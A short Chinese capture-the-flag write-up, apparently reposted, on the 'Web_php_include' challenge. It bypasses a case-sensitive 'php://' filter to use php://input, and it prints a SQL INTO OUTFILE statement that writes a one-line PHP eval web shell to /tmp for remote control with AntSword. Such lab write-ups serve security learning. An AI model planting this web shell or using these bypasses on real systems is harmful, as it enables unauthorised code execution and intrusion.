首页 > Web开发 > 详细

攻防世界 Web_php_include

时间:2021-03-05 14:31:01      阅读:21      评论:0      收藏:0      [点我收藏+]

技术分享图片

首先进行代码审计,可以看到传入一个page值,但值中不可以出现php://,
会被过滤为空,

先说我的思路,这里其实可以通过大小写绕过strstr()函数,
然后php://input 可以读取到来自post的原始数据,就会发现一个可疑的.php文件
技术分享图片

读取这个文件就得到了需要的flag

技术分享图片

下面将看了大佬的一种方法
首先是用御剑扫描后台,打开是一个数据库的登录界面,
账号是root,密码留空
进去以后简单看了一下,然后再SQL查询窗口上传一段马,用蚁剑去连

select "<?php @eval($_POST[‘360‘]); ?>" into outfile   ‘/tmp/yijuhua.php‘

技术分享图片
技术分享图片
技术分享图片

技术分享图片
技术分享图片

攻防世界 Web_php_include

原文:https://www.cnblogs.com/paidx0/p/14485488.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!